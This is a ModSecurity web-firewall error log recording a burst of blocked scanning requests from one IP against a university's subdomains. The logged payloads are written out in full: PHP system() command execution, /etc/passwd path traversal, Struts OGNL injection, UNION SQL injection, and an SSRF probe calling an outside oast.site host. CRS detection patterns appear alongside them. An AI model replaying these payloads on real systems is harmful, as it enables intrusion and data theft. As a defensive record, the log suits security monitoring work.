[Tue Aug 29 11:30:11.737610 2023] [:error] [pid 966] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10U8Co-f0AAAPGfqwAAAAV"]
[Tue Aug 29 11:30:12.607992 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:uri. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:uri: {{228*'98'}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/actions/seomatic/meta-container/all-meta-containers"] [unique_id "ZO10VMCo-f0AAAPLwAoAAAAX"]
[Tue Aug 29 11:30:12.652072 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPS5u4AAAAh"]
[Tue Aug 29 11:30:12.703416 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAN5YFIAAAAN"]
[Tue Aug 29 11:30:12.721287 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPNBPUAAAAZ"]
[Tue Aug 29 11:30:12.736487 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPQkdoAAAAe"]
[Tue Aug 29 11:30:12.743730 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VMCo-f0AAAPS5vEAAAAh"]
[Tue Aug 29 11:30:13.349090 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPRNW0AAAAf"]
[Tue Aug 29 11:30:13.352611 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAOM4T0AAAAU"]
[Tue Aug 29 11:30:13.354383 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPLwBIAAAAX"]
[Tue Aug 29 11:30:13.376097 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAOM4T4AAAAU"]
[Tue Aug 29 11:30:13.398177 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAN5YFkAAAAN"]
[Tue Aug 29 11:30:13.438515 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPRNXEAAAAf"]
[Tue Aug 29 11:30:13.447456 2023] [:error] [pid 978] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VcCo-f0AAAPS5vgAAAAh"]
[Tue Aug 29 11:30:13.464865 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAPRNXIAAAAf"]
[Tue Aug 29 11:30:13.478399 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VcCo-f0AAAOM4UMAAAAU"]
[Tue Aug 29 11:30:14.424584 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAPOhWkAAAAa"]
[Tue Aug 29 11:30:14.425121 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(ver)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VsCo-f0AAAOGaeIAAAAS"]
[Tue Aug 29 11:30:14.427826 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pagina. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../ found within ARGS:pagina: ../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/i3geo/exemplos/codemirror.php"] [unique_id "ZO10VsCo-f0AAAOOuSQAAAAW"]
[Tue Aug 29 11:30:14.575756 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ][]=& found within ARGS:query: app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10VsCo-f0AAAPNBP0AAAAZ"]
[Tue Aug 29 11:30:15.347234 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPXAiEAAAAi"]
[Tue Aug 29 11:30:15.351375 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAOGaeYAAAAS"]
[Tue Aug 29 11:30:15.352338 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPQkeEAAAAe"]
[Tue Aug 29 11:30:15.353444 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPMl9kAAAAY"]
[Tue Aug 29 11:30:15.373728 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAPENakAAAAQ"]
[Tue Aug 29 11:30:15.375300 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAOGaecAAAAS"]
[Tue Aug 29 11:30:15.375501 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAO8724AAAAF"]
[Tue Aug 29 11:30:15.376193 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAOKNl0AAAAK"]
[Tue Aug 29 11:30:15.376760 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10V8Co-f0AAAPMl9oAAAAY"]
[Tue Aug 29 11:30:15.401970 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=(44660*44784)).(#q)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/integration/saveGangster.action"] [unique_id "ZO10V8Co-f0AAAOOuSsAAAAW"]
[Tue Aug 29 11:30:16.331319 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgtarctcfadwp43.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22url\\x5c\\x22:\\x5c\\x22 found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgtarctcfadwp43.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgtarctcfadwp43.oast.site\\x5c\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAPOhW0AAAAa"]
[Tue Aug 29 11:30:16.338670 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:user_id: 11 UNION ALL SELECT NULL,CONCAT(1,md5(999999999),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10WMCo-f0AAAPDnvQAAAAP"]
[Tue Aug 29 11:30:16.347486 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{\\\\"url\\\\":\\\\"http://cjmn8l5jmimk2adbbnlgaeuzb5zn6k9j8.oast.site\\\\"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x5c\\x5c\\x22url\\x5c\\x5c\\x22:\\x5c\\x5c\\x22http://cjmn8l5jmimk2adbbnlgaeuzb5zn6k9j8.oast.site\\x5c\\x5c\\x22}: {\\x5c\\x22url\\x5c\\x22:\\x5c\\x22http://cjmn8l5jmimk2adbbnlgaeuzb5zn6k9j8.oast.site\\x5c\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/visualizer/v1/upload-data"] [unique_id "ZO10WMCo-f0AAAOKNl8AAAAK"]
